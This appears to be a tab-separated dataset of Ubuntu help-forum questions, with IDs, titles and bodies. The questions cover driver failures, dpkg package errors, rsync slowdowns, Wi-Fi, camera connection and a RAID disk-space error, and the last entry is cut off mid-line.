404628	usb audio interface not listed after installing nvidia drivers	after installing nvidia additional drivers ( 319 ) my fast track pro soundcard suddently disappeared from the list of the devices in the `` sound '' settings window , the thing is when i excute `` aplay -l '' there are additional sound devices that are not showing like the nvidia hdmi one , any help is highly appreciated , i want to get the sound working again , i tried doing force-reload and whole bunch of other stuff but with no luck , i 'll be lurking around here hoping for an answer .
404630	how do i optimize tcp on ubuntu 12.04 ?	i work off of chrome on ubuntu . the tcp optimizer people claim that my rwin values are way to low i know that tcp optimizer is designed for windows . but there is a wine based version available . is this worth checking out ? failing that , what codes should i punch in at the console to crank up my rwin ? i 'm told that linux now auto-adjusts these things . but if that 's the case , then why are my rwin scores so low ? ! these are my results : « speedguide.net tcp analyzer results » tested on : 2014.01.08 05:41 ip address : 24.235.xxx.xx client os/browser : linux ( chrome 31.0.1650.63 ) tcp options string : 020405b40402080a0010ab980000000001030307 mss : 1460 mtu : 1500 tcp window : 14720 ( not multiple of mss ) rwin scaling : 7 bits ( 2^7=128 ) unscaled rwin : 115 recommended rwins : 64240 , 128480 , 256960 , 513920 , 1027840 bdp limit ( 200ms ) : 589kbps ( 74kbytes/s ) bdp limit ( 500ms ) : 236kbps ( 29kbytes/s ) mtu discovery : on ttl : 49 timestamps : on sacks : on ip tos : 00000000 ( 0 ) can you help ?
404631	get source code for copy/paste	every operation performed by operating system have a source code . so for coping operation there should be source code . so i need a file 's name having source code for copy operation.so i can add some code to it so that multiple copy operation may be performed . in multiple copy i can copy 2 or more text strings or files one after other from different location and paste after every thing is copied . ( i want to avoid paste operation after every single copy operation . ) can anyone help me to find file containing copy and paste code ? thank you .
404633	firmware 1.79.9 package install operation failed	when i tried to update ubuntu through update manager , all other updates are installed . one update was downloaded but not installed . i tried again and again but error can not be fixed . i get the following error message : package operation failed the installation or removal of a software package failed . detail > > installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 227910 files and directories currently installed . ) preparing to replace linux-firmware 1.79 ( using ... /linux-firmware_1.79.9_all.deb ) ... unpacking replacement linux-firmware ... dpkg : error processing /var/cache/apt/archives/linux-firmware_1.79.9_all.deb ( -- unpack ) : trying to overwrite '/lib/firmware/ar3k/ramps_0x31010000_40.dfu ' , which is also in package bt-dw1705-firmware 0.1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-firmware_1.79.9_all.deb error in function : kindly help me with appropriate answer , since ubuntu tells it is an important security update .
404634	sub-process /usr/bin/dpkg returned an error code ( 1 ) nux-tools_2.14.1-0ubuntu1_i386.deb	hi i have trouble in my ubuntu 11.04 lts , this is what i got . samuel @ samuel : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : aisleriot alsa-utils appmenu-gtk apport apport-gtk apt apt-transport-https apt-utils aptdaemon apturl apturl-common aspell at-spi bamfdaemon banshee banshee-extension-soundmenu baobab base-files bash bind9-host binutils bluez bluez-alsa bluez-cups bluez-gstreamer bogofilter-bdb brasero brasero-cdrkit brasero-common brltty brltty-x11 bsdmainutils ca-certificates checkbox checkbox-gtk compiz compiz-core compiz-gnome compiz-plugins compiz-plugins-main compizconfig-backend-gconf computer-janitor computer-janitor-gtk console-setup consolekit coreutils cpp cpp-4.5 cups cups-bsd cups-client cups-driver-gutenprint dbus-x11 debianutils dnsmasq-base dnsutils doc-base empathy empathy-common eog espeak espeak-data evince evince-common evolution evolution-common evolution-data-server evolution-data-server-common evolution-exchange evolution-indicator evolution-plugins evolution-webcal exiv2 file-roller firefox foo2zjs foomatic-db-compressed-ppds foomatic-db-engine friendly-recovery fuse-utils g++ g++-4.5 gamin gbrainy gcalctool gcc gcc-4.5 gcc-4.5-base gconf-defaults-service gconf-editor gconf2 gconf2-common gdb gdm gedit gedit-common geoclue geoclue-ubuntu-geoip gettext ghostscript ghostscript-x ginn gir1.2-appindicator-0.1 gir1.2-freedesktop gir1.2-gconf-2.0 gir1.2-gdkpixbuf-2.0 gir1.2-glib-2.0 gir1.2-pango-1.0 gir1.2-soup-2.4 glib-networking gnome-applets gnome-applets-data gnome-bluetooth gnome-control-center gnome-desktop-data gnome-disk-utility gnome-icon-theme gnome-keyring gnome-media gnome-nettool gnome-orca gnome-panel gnome-panel-data gnome-power-manager gnome-screensaver gnome-screenshot gnome-search-tool gnome-session gnome-session-bin gnome-session-canberra gnome-session-common gnome-settings-daemon gnome-sudoku gnome-system-log gnome-system-monitor gnome-system-tools gnome-terminal gnome-terminal-data gnome-user-share gnomine gnupg grub-common grub-pc gsettings-desktop-schemas gstreamer0.10-alsa gstreamer0.10-nice gstreamer0.10-plugins-base gstreamer0.10-plugins-base-apps gstreamer0.10-plugins-good gstreamer0.10-pulseaudio gstreamer0.10-tools gstreamer0.10-x gtk2-engines-murrine gtk2-engines-pixbuf gucharmap guile-1.8-libs gvfs gvfs-backends gvfs-fuse gwibber gwibber-service hpijs hplip hplip-cups hplip-data ibus ibus-gtk ibus-pinyin ibus-pinyin-db-android ibus-table ifupdown indicator-applet indicator-applet-appmenu indicator-applet-complete indicator-applet-session indicator-application indicator-appmenu indicator-datetime indicator-messages indicator-session indicator-sound info initscripts iproute iptables iputils-ping isc-dhcp-client isc-dhcp-common jockey-common jockey-gtk language-selector-common language-selector-gnome lftp libaa1 libalgorithm-diff-xs-perl libapparmor-perl libappindicator0.1-cil libappindicator1 libapt-pkg-perl libart2.0-cil libasound2 libasound2-plugins libaspell15 libatkmm-1.6-1 libavahi-core7 libbamf0 libbluetooth3 libbonobo2-0 libbonobo2-common libbonoboui2-0 libc-bin libc-dev-bin libc6 libc6-dev libcaca0 libcairo-perl libcanberra-gtk-module libcanberra-pulse libcanberra0 libcloog-ppl0 libcompizconfig0 libcups2 libcupsimage2 libcupsmime1 libcurl3-gnutls libdb4.8 libdbus-glib-1-2 libdconf0 libdecoration0 libdevmapper-event1.02.1 libdjvulibre21 libedit2 libenchant1c2a libespeak1 libevolution libexempi3 libfs6 libfuse2 libgadu3 libgail-common libgail18 libgamin0 libgcc1 libgconf2-4 libgconf2.0-cil libgcrypt11 libgd2-xpm libgdk-pixbuf2.0-0 libgdu-gtk0 libgirepository-1.0-1 libgkeyfile1.0-cil libgl1-mesa-dri libgl1-mesa-glx libglade2.0-cil libglib-perl libglib2.0-0 libglib2.0-bin libglib2.0-cil libglibmm-2.4-1c2a libgmpxx4ldbl libgnome-bluetooth8 libgnome-desktop-2-17 libgnome-keyring0 libgnome-vfs2.0-cil libgnome2-0 libgnome2.24-cil libgnomeui-0 libgnomevfs2-0 libgnutls26 libgomp1 libgpgme11 libgphoto2-2 libgphoto2-port0 libgs9 libgssapi-krb5-2 libgstreamer-plugins-base0.10-0 libgstreamer0.10-0 libgtk-sharp-beans-cil libgtk-vnc-1.0-0 libgtk2-perl libgtk2.0-0 libgtk2.0-bin libgtk2.0-cil libgtk2.0-common libgtkhtml3.14-19 libgtkmm-2.4-1c2a libgudev1.0-cil libhpmud0 libhtml-parser-perl libidl0 libimobiledevice2 libindicate5 libio-pty-perl libisofs6 libjack-jackd2-0 libjasper1 libk5crypto3 libkrb5-3 libkrb5support0 liblaunchpad-integration1.0-cil libldap-2.4-2 liblocale-gettext-perl liblockfile1 libmetacity-private0 libmission-control-plugins0 libmono-addins-gui0.2-cil libmono-addins0.2-cil libmono-corlib2.0-cil libmono-management2.0-cil libmono-posix2.0-cil libmono-security2.0-cil libmono-sharpzip2.84-cil libmono-system2.0-cil libmono-zeroconf1.0-cil libmpc2 libmpfr4 libncurses5 libncursesw5 libndesk-dbus-glib1.0-cil libndesk-dbus1.0-cil libneon27-gnutls libnet-dbus-perl libnet-dns-perl libnewt0.52 libnice10 libnih-dbus1 libnih1 libnm-glib-vpn1 libnotify0.4-cil libnspr4 liborbit2 libpam-modules libpam-modules-bin libpango-perl libpango1.0-0 libpangomm-1.4-1 libpcsclite1 libpipeline1 libplymouth2 libpolkit-agent-1-0 libpolkit-backend-1-0 libpolkit-gobject-1-0 libpulse-mainloop-glib0 libpulse0 libpurple0 libpython2.7 librdf0 libreadline6 libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw libreoffice-gnome libreoffice-gtk libreoffice-impress libreoffice-math libreoffice-writer librpc-xml-perl librsvg2-2 librsvg2-common libsane libsane-hpaio libsasl2-2 libsasl2-modules libsdl1.2debian libsigc++-2.0-0c2a libsmbclient libsnmp15 libsoup-gnome2.4-1 libsoup2.4-1 libstartup-notification0 libstdc++6 libstdc++6-4.5-dev libsub-name-perl libsyncdaemon-1.0-1 libtag1-vanilla libtag1c2a libtaglib2.0-cil libtelepathy-glib0 libtelepathy-logger2 libterm-readkey-perl libtext-charwidth-perl libtext-iconv-perl libtiff4 libtotem-plparser17 libusbmuxd1 libutouch-frame1 libutouch-geis1 libutouch-grail1 libuuid-perl libv4l-0 libvorbis0a libvorbisenc2 libvorbisfile3 libvte-common libvte9 libwebkitgtk-1.0-0 libwmf0.2-7 libwmf0.2-7-gtk libwpd-0.9-9 libwps-0.2-2 libwww-perl libx11-6 libxapian22 libxaw7 libxcomposite1 libxcursor1 libxdamage1 libxext6 libxfixes3 libxfont1 libxi6 libxinerama1 libxml-parser-perl libxml2 libxp6 libxrandr2 libxrender1 libxres1 libxtst6 libxxf86dga1 libxxf86vm1 libzeitgeist-1.0-1 light-themes lintian linux-generic linux-headers-generic linux-image-generic metacity metacity-common min12xxw modemmanager mono-2.0-gac mono-csharp-shell mono-gac mono-gmcs mono-runtime mount mountall mousetweaks nautilus nautilus-data nautilus-sendto nautilus-sendto-empathy nautilus-share ncurses-bin network-manager network-manager-gnome network-manager-pptp network-manager-pptp-gnome notify-osd ntfs-3g ntpdate onboard openprinting-ppds openssh-client openssl overlay-scrollbar parted passwd perl perl-base perl-modules plymouth plymouth-label pnm2ppa policykit-1-gnome poppler-utils procps protobuf-compiler psmisc pulseaudio pulseaudio-esound-compat pulseaudio-module-bluetooth pulseaudio-module-gconf pulseaudio-module-x11 pulseaudio-utils pxljr python python-appindicator python-apt python-aptdaemon python-aptdaemon-gtk python-aptdaemon.gtk3widgets python-aptdaemon.gtkwidgets python-cairo python-crypto python-dbus python-gconf python-glade2 python-gnome2 python-gnomekeyring python-gobject python-gst0.10 python-gtk2 python-ibus python-imaging python-indicate python-libproxy python-minimal python-openssl python-protobuf python-pyatspi python-pycurl python-pyorbit python-ubuntuone-client python-ubuntuone-control-panel python-uno python-vte python-xapian python2.7 python2.7-minimal rdesktop rsyslog samba-common samba-common-bin seahorse sessioninstaller shotwell simple-scan smbclient software-center software-properties-gtk speech-dispatcher splix sudo synaptic sysvinit-utils tcl tcpdump telepathy-gabble telepathy-haze telepathy-idle telepathy-logger telepathy-mission-control-5 telepathy-salut tomboy totem totem-common totem-mozilla totem-plugins transmission-common transmission-gtk ttf-kacst-one ttf-khmeros-core ttf-lao ttf-liberation ttf-opensymbol ttf-takao-pgothic ttf-thai-tlwg ttf-unfonts-core ubuntu-desktop ubuntu-minimal ubuntu-sso-client ubuntu-wallpapers ubuntuone-client ubuntuone-client-gnome ubuntuone-control-panel ubuntuone-control-panel-gtk udev unity unity-common unity-place-applications unity-place-files uno-libs3 update-manager update-manager-core update-notifier update-notifier-common upower upstart ure usb-creator-common usb-creator-gtk util-linux vim-common vim-tiny vinagre vino wget whois wireless-crda wireless-tools wpasupplicant x11-utils xdg-user-dirs-gtk xkb-data xorg xserver-xorg xserver-xorg-core xserver-xorg-input-evdev xserver-xorg-input-mouse xserver-xorg-input-synaptics xserver-xorg-input-vmmouse xserver-xorg-input-wacom xserver-xorg-video-apm xserver-xorg-video-ark xserver-xorg-video-ati xserver-xorg-video-chips xserver-xorg-video-cirrus xserver-xorg-video-fbdev xserver-xorg-video-geode xserver-xorg-video-i128 xserver-xorg-video-i740 xserver-xorg-video-intel xserver-xorg-video-mach64 xserver-xorg-video-mga xserver-xorg-video-neomagic xserver-xorg-video-nouveau xserver-xorg-video-openchrome xserver-xorg-video-qxl xserver-xorg-video-r128 xserver-xorg-video-radeon xserver-xorg-video-rendition xserver-xorg-video-s3 xserver-xorg-video-s3virge xserver-xorg-video-savage xserver-xorg-video-siliconmotion xserver-xorg-video-sis xserver-xorg-video-sisusb xserver-xorg-video-tdfx xserver-xorg-video-trident xserver-xorg-video-tseng xserver-xorg-video-vesa xserver-xorg-video-vmware xserver-xorg-video-voodoo xterm xz-utils yelp zeitgeist zeitgeist-core zenity the following packages will be upgraded : nux-tools 1 upgraded , 0 newly installed , 0 to remove and 633 not upgraded . need to get 0 b/11.2 kb of archives . after this operation , 23.6 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 144563 files and directories currently installed . ) preparing to replace nux-tools 0.9.46-0ubuntu4 ( using ... /nux-tools_2.14.1-0ubuntu1_i386.deb ) ... unpacking replacement nux-tools ... dpkg : error processing /var/cache/apt/archives/nux-tools_2.14.1-0ubuntu1_i386.deb ( -- unpack ) : trying to overwrite '/usr/share/apport/package-hooks/source_nux.py ' , which is also in package libnux-0.9-common 0.9.46-0ubuntu4 errors were encountered while processing : /var/cache/apt/archives/nux-tools_2.14.1-0ubuntu1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have tried this one but it always the same error i got : sudo dpkg -r libjack-jackd2-0 sudo apt-get -f install sudo apt-get update sudo apt-get upgrade please help ...
404637	adobe flash player privacy settings	concerned with my privacy and the abuse that today every single company of jerks exert upon it i decided to switch from win 7 to ubuntu but being a newbie ( ubuntu is so much different ! ) i ca n't find where are settings.sol and mms.cfg stored . in windows the first is in users/app data/roaming/macromed/sys and the second one ( 64 bit ) in windows/syswow64/macromed/flash . i read that setting the mms.cfg file correctly can prevent flash based websites from spying on you so i wan na set that right in ubuntu . any help appreciated !
404639	automatic sending of windows to virtual desktop 2 in plasma	in kde evironment , i want every libreoffice document , when opened , goes automatically to virtual desktop 2 and every chromium window be on desktop 1 ( whererver they are opened ) . is there a way to make this automatic ?
404640	why does rsync slow down my whole computer ?	my powerful linux desktop ( 12 core , 32gb ram , ssd , fast processor , ubuntu 13.10 ) slows down to a crawl when i rsync from my internal drive to an attached usb3 ntfs drive . typing any command , like `` df '' or `` ls '' , takes 5-10 seconds to respond . the slow feel reminds me of a heavily swapping computer , but the `` free '' command says swap size is zero , with 29gb of ram free ( buffers ) . `` uptime '' shows a load average of about 4.0 , and `` top '' shows that the top processes are the rsync commands . i also see kswapd0 in the top few processes , but no swap space is being used and there 's tons of free ram . the slowdown occurs even when i run rsync at a `` nice '' level of 19 . the slowdown also lasts for about 1-2 minutes after i kill the rsync . the slowdown does n't happen with my other ext4 usb3 disk . the actual transfer rate to the usb disk is fine : it is not slow . i 'm asking about the heavy impact on the usability of the system during the rsync . anybody know why this happens and how to prevent it ? some disk info on the usb disk : $ sudo hdparm -acdgkmurabcmnqw /dev/sdi1 /dev/sdi1 : multcount = 0 ( off ) readonly = 0 ( off ) readahead = 256 ( on ) geometry = 364799/255/63 , sectors = 5860507648 , start = 16384 drive state is : active/idle look-ahead = 1 ( on ) write-caching = 1 ( on ) apm_level = 128 acoustic = not supported max sectors = 5860533168/5860533168 , hpa is disabled i omitted these errors from the above output , presumably from unsupported features : hdio_get_32bit failed : invalid argument hdio_get_unmaskintr failed : invalid argument hdio_get_dma failed : invalid argument /sys/block/sdi/sdi1/device/queue_depth : no such file or directory hdio_get_keepsettings failed : invalid argument
404641	how can i connect to wi-fi with this old laptop ?	i recently got an old dell latitude-d610 laptop that was running windows xp , i think , so i completely deleted xp and put ubuntu on . before i put ubuntu on , the wi-fi was working just fine , but now it is n't . in the settings under 'additional drivers ' it says `` no proprietary drivers are in use on this system '' or something like that , and i think that 's the problem . i 've looked around on this forum and on other places about what to do , and several things said to input the following command : $ lspci -vvnn | grep 14e4 so i did , and it returns this : 02:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm5751 gigabit ethernet pci express [ 14e4:1677 ] ( rev 01 ) 03:03.0 network controller [ 0280 ] : broadcom corporation bcm4306 802.11b/g wireless lan controller [ 14e4:4320 ] ( rev 03 ) i successfully connected to the internet by sharing my pc 's connection through an ethernet cable , but i 've tried many things suggested in these forums and none of them are working . so please , please do not mark this question as a duplicate , as i 've tried almost everything in questions that are indeed very similar to this one , but nothing 's working . also , i 'm not that great at ubuntu , so if you tell me to do something , please say exactly where it is or how to do it . thanks in advance : d
404645	trying to watch a dvd in vlc on ubuntu 12.04 ... not working	i just sit and sit and sit and the dvd does n't play ... i 'm trying to watch a movie ... should i try a different program or is there some package i have to install ... ?
404651	how do i stop application switcher button from rotating screen ?	i have the logitech wave wireless keyboard , and whenever i accidentally press the `` application switcher '' button it rotates the screen by 90 degrees . this would only be moderately annoying if it did n't somehow manage to make 90 degrees the new default rotation at boot , requiring me to dig into my xorg.conf file every time it is inadvertently pressed . i would love to be able to disable this button . i am currently running 13.10 , but this behavior occurred on 13.04 as well . below i have posted the xev output for the button press . thanks for any help you can afford me ! focusout event , serial 51 , synthetic no , window 0xc00001 , mode notifygrab , detail notifyancestor focusin event , serial 51 , synthetic no , window 0xc00001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 51 , synthetic no , window 0x0 , keys : 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 rrscreenchangenotify event , serial 51 , synthetic no , window 0xc00001 , root 0x9e , timestamp 1361413 , config_timestamp 23509 size_index 65535 , subpixel_order subpixelunknown rotation rr_rotate_90 width 1920 , height 1080 , mwidth 508 , mheight 286 rrnotify event , serial 51 , synthetic no , window 0xc00001 , subtype xrrcrtcchangenotifyevent crtc 63 , mode none , rotation rr_rotate_90 x 0 , y 0 , width 0 , height 0 rrnotify event , serial 51 , synthetic no , window 0xc00001 , subtype xrroutputchangenotifyevent output edp1 , crtc none , mode none rotation rr_rotate_0 connection rr_connected , subpixel_order subpixelunknown
404658	chrbuntu graphics acceleration on acer c7 chromebook running 13.10	i have upgraded to ubuntu 13.10 on my acer c7 chromebook . the system is not finding the drivers for the graphics card and is reporting graphics as being gallium 0.4 on llvmpipe ( llvm 3.3 128 bits ) the system runs very slowly . how can i enable the graphics drivers for the x server again ? i have tried using the latest intel open source driver installer from https : //01.org/linuxgraphics/downloads . the program installs correctly on the chromebook but stops running , reporting that it has not found the intel915 chipset . ok.. seems that the issue is related to the kernel in chrubuntu ( which is 3.4 ) whilst the newer versions of ubuntu have moved on . glx requires version 3.6 or greater and glxinfo will crash if invoked with kernel 3.4 the question becomes ... how does one install a newer kernel on an acer chrome hardware .
404664	how to connect nikon d800 to ubuntu ?	( nearly-new ubuntu user here . ) what is the best way to connect my nikon d800 to ubuntu ? when i plug the usb cable into the computer , i get an error message saying unable to mount nikon dsc d800 error initializing camera : -60 : could not lock the device . if i run lsusb , i get the following line : bus 002 device 012 : id 04b0:042a nikon corp. and if i launch the `` home folder '' , i do see the camera listed under `` devices '' , and i can open the folders and see icons for the images , but they only load as thumbnails ( they are raw images ) . i want to have darktable directly import them , as it does perfectly with my olympus e-pl2 camera . but darktable insists that no supported devices were found . the nikon uses the mtp/ptp usb transfer method , while the olympus uses mass storage . ( i do n't see any method for switching the nikon to use mass storage ) . is there a way to get this to work ? thank you much !
404665	how to start virtual box machines automatically when booting ?	i have many virtual box machines in my ubuntu12.04 , each time i shutdown or reboot i have to start them one by one . i wan na a help in writing script for automatically autostart the vbox machines when booting .
404667	weird behavior in eclipse	the menu bar in eclipse is n't working ! i tried removing and installing it again but no help . in my other pc , running the same version of ubuntu ( 13.10 ) , the menu bar is on the top of the window , not on the very top of the screen like in the screenshot
404669	broken usb-drive not given a name with lsblk	i dd'ed my 64gb flashdrive last week , and did not realise that the iso was corrupted until the dd was done . the drive is no longer detected when plugging it and plugging it out . i tried it on a windows machine also , but obviously that computer could n't handle it neither and said that the drivers for the usb stick did n't work . so here i am , with a broken usb stick and ca n't even format it since linux does n't give it a label . i do not care about the data on the drive , just want to fix it . does anyone have any ideas what i could do ? this is what dmesg returns when plugging in the usb-drive : [ 989699.588042 ] usb 2-2 : new high-speed usb device number 4 using ehci_hcd [ 989699.722098 ] scsi7 : usb-storage 2-2:1.0 [ 989721.936053 ] usb 2-2 : reset high-speed usb device number 4 using ehci_hcd [ 989732.180053 ] usb 2-2 : reset high-speed usb device number 4 using ehci_hcd [ 989748.424054 ] usb 2-2 : reset high-speed usb device number 4 using ehci_hcd [ 989748.672037 ] usb 2-2 : reset high-speed usb device number 4 using ehci_hcd [ 989758.916054 ] usb 2-2 : reset high-speed usb device number 4 using ehci_hcd [ 989759.049323 ] scsi 7:0:0:0 : device offlined - not ready after error recovery
404672	how to edit xorg.conf if i loaded from flash drive ?	i upgraded my 12.04- > 12.10- > 13.04- > 13.10 had troubles with nvidia card and installed latest 331 nvidia driver from ppa after that ubuntu stopped loading at all . it wo n't load even in safemode . xorg.0.log says that it ca n't find display 0 or device 0 ( not sure ) . however , loading from bootable stick works . but i ca n't find how can i edit /etc/x11/xorg.conf if i loaded from stick - it just wo n't let me do it . what can i do in this situation ?
404673	setting up display driver	i 'm trying install fglrx from terminal . i 'm using ubuntu few hours so be patient , please . here some output in different command variations : 1 ) $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : fglrx-amdcccle : depends : fglrx but it is not installed e : unmet dependencies . try using -f. 2 ) $ sudo apt-get install fglrx reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : nvidia-settings-304 python-xkit screen-resolution-extra use 'apt-get autoremove ' to remove them . the following new packages will be installed : fglrx 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/82,3 mb of archives . after this operation , 248 mb of additional disk space will be used . ( reading database ... 197920 files and directories currently installed . ) unpacking fglrx ( from ... /fglrx_2 % 3a13.101-0ubuntu3_amd64.deb ) ... /usr/share/ati/fglrx-uninstall.sh : 32 : /usr/share/ati/fglrx-uninstall.sh : can not create /etc/ati/fglrx-uninstall.log : directory nonexistent [ warning ] uninstall : inst_path_default or inst_path_override does not exist in /etc/ati . this suggests that the amd driver is not installed , the amd driver is only partially installed , or the current amd driver installed is an older version than the one this script was designed for . both files listed above are required for determining where installed files are located . to force uninstallation of the driver by guessing where the uninstallation files are located , set the force option re-run /usr/share/ati/fglrx-uninstall.sh ( this is not recommended ) . dpkg : error processing /var/cache/apt/archives/fglrx_2 % 3a13.101-0ubuntu3_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/fglrx_2 % 3a13.101-0ubuntu3_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) 3 ) $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : nvidia-settings-304 python-xkit screen-resolution-extra use 'apt-get autoremove ' to remove them . the following extra packages will be installed : fglrx the following new packages will be installed : fglrx 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/82,3 mb of archives . after this operation , 248 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 197920 files and directories currently installed . ) unpacking fglrx ( from ... /fglrx_2 % 3a13.101-0ubuntu3_amd64.deb ) ... /usr/share/ati/fglrx-uninstall.sh : 32 : /usr/share/ati/fglrx-uninstall.sh : can not create /etc/ati/fglrx-uninstall.log : directory nonexistent [ warning ] uninstall : inst_path_default or inst_path_override does not exist in /etc/ati . this suggests that the amd driver is not installed , the amd driver is only partially installed , or the current amd driver installed is an older version than the one this script was designed for . both files listed above are required for determining where installed files are located . to force uninstallation of the driver by guessing where the uninstallation files are located , set the force option re-run /usr/share/ati/fglrx-uninstall.sh ( this is not recommended ) . dpkg : error processing /var/cache/apt/archives/fglrx_2 % 3a13.101-0ubuntu3_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/fglrx_2 % 3a13.101-0ubuntu3_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i do n't know , maybe i looking wrong way . all i want is to split desktop into 2 displays : built in ( notebook ) and additional one . i have asus k53ta with radeon hd 6720g2 video card . is there any easy and acceptable solution for me ? my os is ubuntu 13.10 .
404677	how to configure special keys ?	this is not as common as it sounds , please check this picture . there are 3 buttons on the top right . the one on the left has `` gears '' on it , the one in the middle has `` w '' like shape and the one on the right has something like a window with a star on it 's bottom-left side . is there a way to configure these buttons ? i tried many tools like showkey , xmodmap and others , but none could capture the signal of any of those 3 keys . is there a way to configure them ?
404682	what exactly does `dpkg` remove ?	i recently installed kingsoft office just for trying it out.when i tried to purge it , i faced some problems . writer , presentation etc.. can be opened with commands like et , etc.. so , my first trial was to try sudo apt-get purge et , but it came up with an error et is not installed . i tried sudo dpkg -p kingsoft-office because the version in this screen shot says kingsoft-office . even this did n't work . but , running sudo apt-get purge kingsoft-office worked ! ! is n't apt-get just a frontend of dpkg ? what exactly is the difference between them ? why did sudo apt-get purge kingsoft-office work and sudo dpkg -p kingsoft-office not work ?
404683	ubuntu 13.10 /sbin/modprobe : invalid option -- 'l ' error	when i try to compile compat wireless 3.11 in ubuntu 13.10 , it gives me this error : dilip @ inspiron : ~/compat-wireless-3.1.1-1 $ make /sbin/modprobe : invalid option -- 'l' /sbin/modprobe : invalid option -- 'l' make -c /lib/modules/3.11.0-12-generic/build m=/home/dilip/compat-wireless-3.1.1-1 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.11.0-12-generic' /sbin/modprobe : invalid option -- 'l' /sbin/modprobe : invalid option -- 'l' cc [ m ] /home/dilip/compat-wireless-3.1.1-1/compat/main.o in file included from include/linux/mm.h:8:0 , from include/linux/scatterlist.h:6 , from include/linux/dmaengine.h:27 , from include/linux/netdevice.h:38 , from /home/dilip/compat-wireless-3.1.1-1/include/linux/compat-2.6.29.h:5 , from /home/dilip/compat-wireless-3.1.1-1/include/linux/compat-2.6.h:24 , from < command-line > :0 : include/linux/gfp.h : in function ‘gfp_zonelist’ : include/linux/gfp.h:272:2 : error : implicit declaration of function ‘is_enabled’ [ -werror=implicit-function-declaration ] if ( is_enabled ( config_numa ) & & unlikely ( flags & __gfp_thisnode ) ) ^ how can i fix this ? this is not the full compile information . it is very long !
404692	dropbox is n't running/is already running	whenever i start my computer , dropbox does not automatically start itself aswell . furthermore , when i try to start it using the program launcher , nothing happens . i then tried the command line ( dropbox status ) , which gives : dropbox is n't running ! naturally i want to start it using the command dropbox start , which returns : dropbox is n't running ! dropbox is already running ! odd ! my current workaround is to delete the .dropbox-dist and .dropbox folders from ~/ and then do dropbox start -i , which starts the installer again and gives me access to my dropbox up to the point at which i have to restart my computer . any solution on this ? thanks !
404694	mdadm array : there is not enough space on the disk	i have this array of approx 6tb ( ext4 ) and i am getting a disk space error . i only have a total of 800gb to copy to the shares i have created . i am using robocopy to copy this data from a windows domain server , the error message is similar for each of the files . new file 107464 dsc00095.jpg 2014/01/14 09:52:22 error 112 ( 0x00000070 ) creating destination directory \\server-storage1\data-archive\2003\030907\08 photos\ there is not enough space on the disk . any ideas what the problem is , where have i gone wrong ? /dev/md0 : version : 1.2 creation time : fri jan 10 16:47:14 2014 raid level : raid5 array size : 5860267648 ( 5588.79 gib 6000.91 gb ) used dev size : 2930133824 ( 2794.39 gib 3000.46 gb ) raid devices : 3 total devices : 3 persistence : superblock is persistent update time : mon jan 13 17:03:14 2014 state : clean active devices : 3 working devices : 3 failed devices : 0 spare devices : 0 layout : left-symmetric chunk size : 64k name : server-bne-storage1:0 uuid : 5474ef82:8beeded5 : c2aaae98 : d968bc74 events : 90767 number major minor raiddevice state 0 8 17 0 active sync /dev/sdb1 1 8 33 1 active sync /dev/sdc1 3 8 49 2 active sync /dev/sdd1 there is still 5.2tb available reported by df -h /dev/md0 5.5t 58m 